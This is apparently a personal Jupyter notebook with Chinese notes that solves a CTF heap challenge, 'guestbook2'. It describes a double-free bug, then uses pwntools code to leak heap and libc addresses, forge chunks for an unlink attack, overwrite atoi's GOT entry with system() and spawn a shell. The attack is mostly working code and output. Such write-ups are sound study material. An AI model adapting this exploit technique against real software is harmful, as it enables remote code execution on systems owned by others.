1. post不能超过0x10个；post的元数据结构如下:
<img alt="post_struct" src="./post_struct.jpg" width="90%" height="90%">

2. 每次新增post时会从头寻找是否有删除的post, 有的话会用上它的位置来存储新post的信息. post的大小会确保为0x80即128的整数.

3. 编辑时, 如果新输入的大小与原来的不同, 会realloc给post分配新的块.

4. 删除post是按输入的序号在post列表里找; 会把"是否使用中"置零, 但删除时却没有判断"是否使用中", 且post删除后其地址信息没有抹去, 因此可以double free. 

In [1]:
%load_ext autoreload
%autoreload 2
formatter = get_ipython().display_formatter.formatters['text/plain']
formatter.for_type(int, lambda n, p, cycle: p.text("0x%X" % n))

import os
os.sys.path.append('../')

from pwn import *

libc=ELF('./libc.so.6')
guestbook2=ELF('./guestbook2')

[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/bohan/.cache/.pwntools-cache-3.6/update to 'never' (old way).
    Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
        [update]
        interval=never
[*] You have the latest version of Pwntools (4.6.0)


[*] '/home/bohan/res/ubuntu_share/pwn_test/double_free_1/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/bohan/res/ubuntu_share/pwn_test/double_free_1/guestbook2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fe000)
    RUNPATH:  b'.'


In [2]:
# import util
from util import *

In [3]:
z_write = write_pipe
z_print = lambda *args: None

In [4]:
os.read(w_pipe, 1)

KeyboardInterrupt: 

In [5]:
def send_line(s):
    z_write(s + '\n')
    z_print()

def list_post():
    z_write('1\n', waittime=0.3)
    z_print()
def new_post(post):
    z_write('2', len(post), post, waittime=0.3, end='\n')
    z_print(False)
def edit_post(i, post_len, post_ctn):
    z_write('3', i, post_len, post_ctn, waittime=0.3, end='\n')
    z_print(False)
def delete_post(i):
    z_write('4', i, waittime=0.3, end='\n')
    z_print()
def exit_process():
    z_write('5\n', waittime=0.3)
    z_print()

In [6]:
def real_size(post_size):
    return (128 - post_size % 128) % 128 + post_size

In [7]:
list_post()

In [8]:
new_post('a')
new_post('b')
new_post('c')
new_post('d')

In [123]:
delete_post(0)
delete_post(2)

In [124]:
new_post('12345678')
list_post()

In [125]:
chunk2_addr = int(reverse_str('40a9 d601'), 16)
chunk2_addr

0x1D6A940

In [126]:
# 计算堆的基址
heap_base = chunk2_addr - (0x80+0x10)*2 - (0x1810+0x10)
post0_info_addr = heap_base + 0x10 + 0x10
# 每个post存是否使用,大小,post地址3个数据, 各占8个字节
post_info_addrs = [
    (
        post0_info_addr + i * 24 , 
        post0_info_addr + i * 24 + 8,
        post0_info_addr + i * 24 + 16, 
    )
    for i in range(4)
]

post_info_addrs

[(0x1D69020, 0x1D69028, 0x1D69030),
 (0x1D69038, 0x1D69040, 0x1D69048),
 (0x1D69050, 0x1D69058, 0x1D69060),
 (0x1D69068, 0x1D69070, 0x1D69078)]

In [127]:
delete_post(0)
delete_post(1)
delete_post(3)

In [128]:
payload = (
    p64(0) + 
    p64(0x80) + 
    p64(post_info_addrs[0][2] - 0x18) + 
    p64(post_info_addrs[0][2] - 0x10) + 
    b"0"*0x60 + 
    p64(0x80) + 
    p64(0x90) +  
    b"1"*0x80 + 
    p64(0) + 
    p64(0x91) + 
    b"2"*0x80 + 
    p64(0) + # 如果没有这一块, 将会报错, 应该与向前合并的检测有关
    p64(0x91) + 
    b"3"*0x80
)

# print_hex(payload)

In [129]:
new_post(payload)

In [130]:
delete_post(1)

In [47]:
# new_post(
#     p64(0) +   # 原c0 + 0x10
#     p64(0x80) + \
#     p64(post_info_addrs[0][2] - 0x18) + \
#     p64(post_info_addrs[0][2] - 0x10) + \
#     b"0"*0x60 + \
#     b"1"*0x90 + \  # 原c1
#     p64(0x80 + 0x90) + \  # 原c2
#     p64(0x90) + \
#     b"2"*0x80 + \
#     p64(0) + \  # 原c3
#     p64(0x91) + \
#     b"3"*0x80
# )

# delete_post(2)

In [131]:
payload2 = p64(1) + p64(1) + p64(0x8) + p64(guestbook2.got['atoi']) + b'k' * (0x230 - 8 * 4)

In [132]:
edit_post(0, 0x230, payload2)

In [133]:
list_post()

In [134]:
atoi_got_addr = int(reverse_str('50 4f58 7a3b 7f'), 16)
libc_base = atoi_got_addr - libc.sym['atoi']
system_libc_addr = libc_base + libc.sym['system']
atoi_got_addr, libc_base, system_libc_addr

(0x7F3B7A584F50, 0x7F3B7A54B000, 0x7F3B7A591640)

In [136]:
payload3 = p64(system_libc_addr)

In [137]:
edit_post(0, len(payload3), payload3)

In [138]:
send_line('/bin/sh')

In [139]:
send_line('ls')

In [14]:
exit_process()